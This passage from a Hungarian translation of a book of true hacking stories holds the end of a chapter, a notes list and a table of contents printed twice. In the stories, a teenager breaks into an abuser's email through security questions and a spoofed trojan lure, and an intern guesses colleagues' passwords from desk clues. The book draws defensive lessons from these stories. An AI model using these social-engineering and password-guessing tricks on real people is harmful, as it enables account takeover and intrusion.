de dörzsöltebb volt nálam. Vírusirtó szoftver volt nála telepítve, amely
blokkolta a próbálkozásaimat. A vicces az volt, hogy sosem tételezett
fel rólam semmi rosszindulatot. Azt hitte, hogy talán meg van fertőzve a
számítógépem, és a vírus megkísérli az általam küldeni próbált
képekhez csatolni magát. Én meg csak játszottam a hülyét.
Néhány nap csevegés után elkezdett nyomulni. Szemérmetlen képeket
akart rólam, és azt mondta, hogy szeret és találkozni akar velem.
Elsőosztályú szemétláda és kiváló célpont volt egy lelkifurdalás nélküli
lejáratáshoz, feltéve, hogy végre be tudok jutni. Elég információt
gyűjtöttem róla ahhoz, hogy hozzáférést szerezzek néhány e-mail
postaládájához. Tudod, milyen titkos kérdéseket tesznek fel neked? „Mi
a kedvenc színed?” „Mi az édesanyád leánykori neve?” Csak ki kellett
ezeket szednem belőle, és hopp, már benn is voltam.
Erősen illegális cuccokat találtam ott. Elég, ha a töménytelen
mennyiségű, különbözőéletkorú gyerekeket ábrázoló pornográf képet
említem. Beteggé tettek.
Aztán hirtelen rájöttem. Ha tőlem nem fogadja el a Trójait,
valamelyik pornócimborájától majd elfogadja. Meghamisítottam egy e-
mail címet, és a következőrövid üzenetet küldtem neki.
Nézd meg ezt a friss húst. Letöltés előtt kapcsold ki a vírusirtót, mert
elcseszi a képek minőségét.
U.i. Jössz nekem eggyel.
Biztosra vettem, hogy bekapja a csalit, és egész délután türelmesen
vártam, hogy megnézze a levelet. Aztán már majdnem feladtam. Nem
nekem találták ki ezt az egész [social engineering] valamit.
Végül este 11 körül megtörtént. Üzenetet kaptam a Trójáimtól,
amelyből megtudtam, hogy telepítette a gépére. Megcsináltam!
Hozzáférést szereztem, és azonnal elkezdtem a bizonyítékokat egy [a
számítógépén általam létrehozott] mappába másolni. A mappának a
„lolita” nevet adtam. Mindent megtudtam a fickóról. A nevét, a címét,
hol dolgozik, még azt is, hogy milyen dokumentumokon dolgozott éppen
akkoriban.
Nem hívhattam fel egyszerűen az FBI-t vagy a helyi rendőrséget
mert attól féltem, hogyha tudomást szereznek a fickó számítógépén
levőanyagról, az engem is börtönbe juttathat, és féltem. Némi további
kíváncsiskodás után kiderült, hogy nős és gyerekei vannak Ez
borzalmas volt.
Az egyetlen dolgot tettem, amit tudtam. Küldtem egy e-mailt a
feleségének, és megmondtam neki, hogy hol találja a lolita mappát.
Aztán eltüntettem a nyomaimat, és leszedtem a Trójait.
Ekkor kóstoltam bele először abba, hogy ne csak kódokat, hanem
érzelmeket is felhasználjak valaminek az elkövetéséhez. Amint
hozzáférést szereztem, rájöttem, hogy ez nem olyan, mint amilyennek
gondoltam. A tudásnál többet igényelt: ravaszságot, hazugságokat,
manipulálást és kemény munkát. De minden erőfeszítést megért, hogy
beégettem ezt a seggfejet. Tizenöt évesen királynak éreztem magam.
De senkinek nem beszélhettem róla.
Mégis azt kívánom, bárcsak ne láttam volna azokat a képeket.

... ÉS MÉG CSAK HACKERNEK SEM KELL LENNED

A könyvben szereplő történetekből világosan kiderül, hogy a legtöbb


hacker éveket tölt tudása gazdagításával. Ezért tartom rendkívül
figyelemre méltónak, amikor egy hackelési háttérrel nem rendelkező
valaki hacker típusú gondolkodással hajt végre támadást. A következő
történet ezek közé tartozik.
A történtek idején John utolsó éves informatikushallgató volt a
főiskolán, és talált egy gyakornoki állást a helyi elektromos és
gázszolgáltató vállalatnál, mondván, így az iskola végeztével nem csak
diplomája, hanem némi munka-tapasztalata is lesz. A cég azt a
feladatot adta neki, hogy frissítse az alkalmazottak gépen futó Lotus
Notes programot. Amikor egyenként felhívta az alkalmazottakat és
megbeszélt velük egy időpontot, megkérdezte tőlük a Lotus Notes
jelszavukat, hogy végre tudja hajtani a frissítést. Az emberek habozás
nélkül megadták neki a kért információt.
Néha azonban csak a hangpostájukkal tudott beszélni, és bár az
időpontot elmondta nekik, nem volt rá lehetőség, hogy előre
megkérdezze jelszavukat. Nem maradt más lehetősége, mint
megpróbálni kitalálni azokat; – Azt tapasztaltam, hogy az emberek 80
százaléka meg sem változtatta a jelszavát azóta, hogy a Notus-t
telepítették a rendszerükre, így az első próbálkozásom a „pass” volt.
Ha ez nem működött, John körülnézett a felhasználó íróasztalán, és
Post-it cetli után kutatott, amelyre a jelszavakat felírhatták. A cetlit
általában közvetlenül a monitorra ragasztották, esetleg a billentyűzetük
alá vagy a legfelső fiókjukba rejtették (ha egyáltalán használhatjuk erre
a „rejteni” kifejezést).
És ha ez a megközelítés sem járt sikerrel, még mindig volt egy
kijátszható kártyája. – A támadásom utolsó lépéseként az íróasztalon
levő személyes tárgyakat vettem szemügyre. Olyasmi után kutattam,
ami a gyerekek nevére, háziállatokra, hobbikra vagy bármi ilyenre utal.
– A legtöbbször néhány próbálkozás elegendőnek bizonyult.
Az egyik eset a szokottnál keményebb dió volt. – Még ma is
emlékszem, hogy az egyik nő jelszavával mindaddig nem boldogultam,
amíg észre nem vettem, hogy a falon levő összes képen egy motor volt.
– Hirtelen ötlettől vezérelve megpróbálta a „harley”-t... és bejutottam.
A sikertől felajzva elkezdte vezetni az eredményeket. – Játékként
fogtam fel az egészet, és az esetek több mint 90 százalékában sikerült
bejutnom, felhasználónként kevesebb mint 10 perc alatt. Amelyik
jelszó először kifogott rajtam, arról később kiderült, hogy olyan
egyszerű, hogy némi háttérkutatással könnyedén ki lehetett deríteni –
gyakran például a gyerekek születési dátuma. Hasznos gyakorlatnak
bizonyult, olyannak, amely „nem csak az életrajzomat gazdagította,
hanem megtanított rá, hogy a hackerek elleni védekezésünk első vonala
a leggyengébb, és ez nem más, mint maguk a felhasználók és az általuk
választott jelszavak.
Meglátása igen bölcs zárszónak tűnik. Ha éjjel minden számítógép-
felhasználó feljavítaná jelszavait – és az új jelszavukat nem hagynák
könnyen megtalálható helyen akkor holnap reggel hirtelen egy sokkal
biztonságosabb világban találnánk magunkat. Reméljük, legalább
könyvük olvasói veszik ezt az üzenet.

JEGYZETEK

1. CNet News.com, „Lost World, LAPD: Hacks or Hoaxes?”, Janet


Kornblunn, 1 997. május 30.
2. CNet News.com, „The Ten Most Subversive Hacks”, Matt Lcke,
1999. október 27.

Tartalom
A könyv szerzőiről
Dicsérő szavak A megtévesztés művészete című könyvről
Előszó
Köszönetnyilvánítás
Kevin Mitnicktől
Bili Simontól
1. fejezet
Kaszinók hackelése egymillió dolcsiért
Kutatás
A hackelés kidolgozása
A kód átírása
Visszatérés a kaszinókba – ez alkalommal játszani
Új megközelítés
Az új támadás
Elkaptak!
Utóhang
BETEKINTÉS
ÓVINTÉZKEDÉSEK
ZÁRÓJELBEN
2. Fejezet
Amikor terroristák hívnak
Khalid, a terrorista belógatja a csalit
A ma esti cél: SIPRNET
Az aggódás ideje
Elvtárst letartóztatják
Nyomozás Khalid után
A Harkat ul-Mujahideen
Szeptember 11. következményei
Betörés a Fehér Házba
Utóhang
Öt évvel később
Milyen nagy a fenyegetés?
BETEKINTÉS
ÓVINTÉZKEDÉSEK
ZÁRÓJELBEN
JEGYZETEK
3. fejezet
A texasi börtönhack
Odabenn; a számítógépek felfedezése
A szövetségi börtönök nem ilyenek
William kulcsot kap a mennyországba
Biztonságos csatlakozás
A megoldás
Majdnem bukta
Közeli hívás
Felnövekedés
Ismét szabadlábon
BETEKINTÉS
ÓVINTÉZKEDÉSEK
ZÁRÓJELBEN
4. fejezet
Rabló-pandúr
Phreaking[1]
A bíróságon
A szálloda vendégei
Ajtónyitás
A barikádok védelme
Megfigyelve
Összeomlás
Kísért a múlt
Benne vagyunk a hírekben
Letartóztatva
Vége a jó szerencsének
Börtönphreaking
A büntetés letöltése
Hogyan élnek ma
BETEKINTÉS
ÓVINTÉZKEDÉSEK
ZÁRÓJELBEN
JEGYZETEK:
5. fejezet
A Robin Hood hacker
Kiszabadulás
Gyökerek
Éjszakai találkák
MCI WorldCom
Hős, de nem szent: A New York Times hack
Adrian képességeinek egyedülálló természete
Könnyen szerzett információ
Napjainkban
BETEKINTÉS
ÓVINTÉZKEDÉSEK
ZÁRÓJELBEN
JEGYZETEK
6. fejezet
A behatolási tesztelés bölcsessége és butasága
HIDEG TÉL
Az első megbeszélés
Alapszabályok
Támadás!
Áramszünet
Információ a hangpostákból
A végső jelentés
FIGYELMEZTETŐ JÁTÉK
A megbízás szabályai
Tervezés
Támadás!
Munkában a l0phtCrack
Hozzáférés
Megriadva
A szellem
Kérdőre vonás nélkül
Kézmelegítős trükk
ZÁRÓJELBEN
7. fejezet
A bankja természetesen biztonságos, ugye?
A TÁVOLI ÉSZTORSZÁGBAN
A Perogie Bank
Személyes vélemény
A TÁVOLSÁGI BANKHACKELÉS
Hackernek nem születsz, hanem azzá válsz
A banki betörés
Érdekel valakit egy svájci bankszámla?
Utóhang
BETEKINTÉS
ÓVINTÉZKEDÉSEK
ZÁRÓJELBEN
JEGYZETEK
8. fejezet
A szellemi tulajdon sincs biztonságban
A KÉTÉVES HACKELÉS
Vizsgálat indul
Az ügyvezető számítógépe
Bejutás az ügyvezető számítógépébe
Az ügyvezető kifigyeli a betörést
Hozzáférés szerzése az alkalmazáshoz
Megvagy!
Vissza az ellenséges területre
Még mindig nem
ROBERT, A SPAMMER BARÁTJA
A levelezőlisták megszerzése
Pornó kifizetés
ROBERT, AZ EMBER
A csábító szoftver
A szervernevek kiderítése
Egy kis segítség a helpdesk.exe-től
A hacker varázstárából; az „SQL injection” támadás
A biztonsági mentés készítésének veszélyei
Észrevételek a jelszavakról
Teljes hozzáférés szerzése
A kód hazaküldése
MEGOSZTÁS: A CRACKER VILÁGA
BETEKINTÉS
ÓVINTÉZKEDÉSEK
Céges tűzfalak
Személyi tűzfalak
Portszkennelés
Ismerjük meg a rendszerünket
A támadásra adott válasz és a riasztás
Jogosulatlan változtatások észlelése az alkalmazásokban
Engedélyek
Jelszavak
Külsős (harmadik fél által készített) alkalmazások
Megosztott állományok védelme
A DNS tippelés megelőzése
A Microsoft SQL szerverek védelme
Titkos fájlok védelme
Biztonsági másolatok védelme
Az MS SQL Injection támadások elleni védelem
A Microsoft VPN szolgáltatások használata
Telepítési fájlok eltávolítása
A rendszergazdai fiókok átnevezése
A Windows megerősítése bizonyos hitelesítők tárolásának
elkerülésével
Mélységi védelem
ZÁRÓJELBEN
JEGYZETEK
9. fejezet
A kontinensen
Valahol Londonban
Belemerülés
A hálózat feltérképezése
Egy router azonosítása
A második nap
A 3COM eszköz konfigurációjának áttekintése
A harmadik nap
Néhány gondolat a hackerek megérzéseiről
A negyedik nap
Hozzáférés a cég rendszeréhez
Cél teljesítve
BETEKINTÉS
ÓVINTÉZKEDÉSEK
Ideiglenes megoldások
Magas számú portok használata
Jelszavak
Hitelesítés
Felesleges szolgáltatások szűrése
Megerősítés
ZÁRÓJELBEN
10. fejezet
Social engineerek – Hogyan működnek és hogyan akadályozzuk
meg őket?
MUNKÁBAN A SOCIAL ENGINEER
BETEKINTÉS
Szerepcsapdázás
Szavahihetőség
Szerep ráerőltetése a célpontra (Altercasting)
Az engedékenység pillanata
A segítségnyújtás iránti vágy
Társított tulajdonságok
Rokonszenv
Félelem
Ellenállás
ÓVINTÉZKEDÉSEK
Képzési irányelvek
Social engineering elleni programok
Egy könnyed kitérő: Ismerjük meg saját családunk manipulátorait
– gyerekeinket
ZÁRÓJELBEN
JEGYZETEK
11. fejezet
Egypercesek
A HIÁNYZÓ FIZETÉSI CSEKK
GYERE HOLLYWOODBA, TE VARÁZSLÓ TINÉDZSER
AZ ÜDÍTŐAUTÓMATAMEGHACKELÉSE
AZ IRAKI HADSEREG MEGBÉNÍTÁSA A SIVATAGI
VIHARBAN
A MILLIÁRD DOLLÁROS AJÁNDÉKUTALVÁNY
A TEXAS HOLD’EM HACKELÉS
A TIZENÉVES PEDOFILÜLDÖZÖ
... ÉS MÉG CSAK HACKERNEK SEM KELL LENNED
JEGYZETEK
Tartalom
A könyv szerzőiről
Dicsérő szavak A megtévesztés művészete című könyvről
Előszó
Köszönetnyilvánítás
Kevin Mitnicktől
Bili Simontól
1. fejezet
Kaszinók hackelése egymillió dolcsiért
Kutatás
A hackelés kidolgozása
A kód átírása
Visszatérés a kaszinókba – ez alkalommal játszani
Új megközelítés
Az új támadás
Elkaptak!
Utóhang
BETEKINTÉS
ÓVINTÉZKEDÉSEK
ZÁRÓJELBEN
2. Fejezet
Amikor terroristák hívnak
Khalid, a terrorista belógatja a csalit
A ma esti cél: SIPRNET
Az aggódás ideje
Elvtárst letartóztatják
Nyomozás Khalid után
A Harkat ul-Mujahideen
Szeptember 11. következményei
Betörés a Fehér Házba
Utóhang
Öt évvel később
Milyen nagy a fenyegetés?
BETEKINTÉS
ÓVINTÉZKEDÉSEK
ZÁRÓJELBEN
JEGYZETEK
3. fejezet
A texasi börtönhack
Odabenn; a számítógépek felfedezése
A szövetségi börtönök nem ilyenek
William kulcsot kap a mennyországba
Biztonságos csatlakozás
A megoldás
Majdnem bukta
Közeli hívás
Felnövekedés
Ismét szabadlábon
BETEKINTÉS
ÓVINTÉZKEDÉSEK
ZÁRÓJELBEN
4. fejezet
Rabló-pandúr
Phreaking[1]
A bíróságon
A szálloda vendégei
Ajtónyitás
A barikádok védelme
Megfigyelve
Összeomlás
Kísért a múlt
Benne vagyunk a hírekben
Letartóztatva
Vége a jó szerencsének
Börtönphreaking
A büntetés letöltése
Hogyan élnek ma
BETEKINTÉS
ÓVINTÉZKEDÉSEK
ZÁRÓJELBEN
JEGYZETEK:
5. fejezet
A Robin Hood hacker
Kiszabadulás
Gyökerek
Éjszakai találkák
MCI WorldCom
Hős, de nem szent: A New York Times hack
Adrian képességeinek egyedülálló természete
Könnyen szerzett információ
Napjainkban
BETEKINTÉS
ÓVINTÉZKEDÉSEK
ZÁRÓJELBEN
JEGYZETEK
6. fejezet
A behatolási tesztelés bölcsessége és butasága
HIDEG TÉL
Az első megbeszélés
Alapszabályok
Támadás!
Áramszünet
Információ a hangpostákból
A végső jelentés
FIGYELMEZTETŐ JÁTÉK
A megbízás szabályai
Tervezés
Támadás!
Munkában a l0phtCrack
Hozzáférés
Megriadva
A szellem
Kérdőre vonás nélkül
Kézmelegítős trükk
ZÁRÓJELBEN
7. fejezet
A bankja természetesen biztonságos, ugye?
A TÁVOLI ÉSZTORSZÁGBAN
A Perogie Bank
Személyes vélemény
A TÁVOLSÁGI BANKHACKELÉS
Hackernek nem születsz, hanem azzá válsz
A banki betörés
Érdekel valakit egy svájci bankszámla?
Utóhang
BETEKINTÉS
ÓVINTÉZKEDÉSEK
ZÁRÓJELBEN
JEGYZETEK
8. fejezet
A szellemi tulajdon sincs biztonságban
A KÉTÉVES HACKELÉS
Vizsgálat indul
Az ügyvezető számítógépe
Bejutás az ügyvezető számítógépébe
Az ügyvezető kifigyeli a betörést
Hozzáférés szerzése az alkalmazáshoz
Megvagy!
Vissza az ellenséges területre
Még mindig nem
ROBERT, A SPAMMER BARÁTJA
A levelezőlisták megszerzése
Pornó kifizetés
ROBERT, AZ EMBER
A csábító szoftver
A szervernevek kiderítése
Egy kis segítség a helpdesk.exe-től
A hacker varázstárából; az „SQL injection” támadás
A biztonsági mentés készítésének veszélyei
Észrevételek a jelszavakról
Teljes hozzáférés szerzése
A kód hazaküldése
MEGOSZTÁS: A CRACKER VILÁGA
BETEKINTÉS
ÓVINTÉZKEDÉSEK
Céges tűzfalak
Személyi tűzfalak
Portszkennelés
Ismerjük meg a rendszerünket
A támadásra adott válasz és a riasztás
Jogosulatlan változtatások észlelése az alkalmazásokban
Engedélyek
Jelszavak
Külsős (harmadik fél által készített) alkalmazások
Megosztott állományok védelme
A DNS tippelés megelőzése
A Microsoft SQL szerverek védelme
Titkos fájlok védelme
Biztonsági másolatok védelme
Az MS SQL Injection támadások elleni védelem
A Microsoft VPN szolgáltatások használata
Telepítési fájlok eltávolítása
A rendszergazdai fiókok átnevezése
A Windows megerősítése bizonyos hitelesítők tárolásának
elkerülésével
Mélységi védelem
ZÁRÓJELBEN
JEGYZETEK
9. fejezet
A kontinensen
Valahol Londonban
Belemerülés
A hálózat feltérképezése
Egy router azonosítása
A második nap
A 3COM eszköz konfigurációjának áttekintése
A harmadik nap
Néhány gondolat a hackerek megérzéseiről
A negyedik nap
Hozzáférés a cég rendszeréhez
Cél teljesítve
BETEKINTÉS
ÓVINTÉZKEDÉSEK
Ideiglenes megoldások
Magas számú portok használata
Jelszavak
Hitelesítés
Felesleges szolgáltatások szűrése
Megerősítés
ZÁRÓJELBEN
10. fejezet
Social engineerek – Hogyan működnek és hogyan akadályozzuk
meg őket?
MUNKÁBAN A SOCIAL ENGINEER
BETEKINTÉS
Szerepcsapdázás
Szavahihetőség
Szerep ráerőltetése a célpontra (Altercasting)
Az engedékenység pillanata
A segítségnyújtás iránti vágy
Társított tulajdonságok
Rokonszenv
Félelem
Ellenállás
ÓVINTÉZKEDÉSEK
Képzési irányelvek
Social engineering elleni programok
Egy könnyed kitérő: Ismerjük meg saját családunk
manipulátorait – gyerekeinket
ZÁRÓJELBEN
JEGYZETEK
11. fejezet
Egypercesek
A HIÁNYZÓ FIZETÉSI CSEKK
GYERE HOLLYWOODBA, TE VARÁZSLÓ TINÉDZSER
AZ ÜDÍTŐAUTÓMATAMEGHACKELÉSE
AZ IRAKI HADSEREG MEGBÉNÍTÁSA A SIVATAGI
VIHARBAN
A MILLIÁRD DOLLÁROS AJÁNDÉKUTALVÁNY
A TEXAS HOLD’EM HACKELÉS
A TIZENÉVES PEDOFILÜLDÖZÖ
... ÉS MÉG CSAK HACKERNEK SEM KELL LENNED
JEGYZETEK

You might also like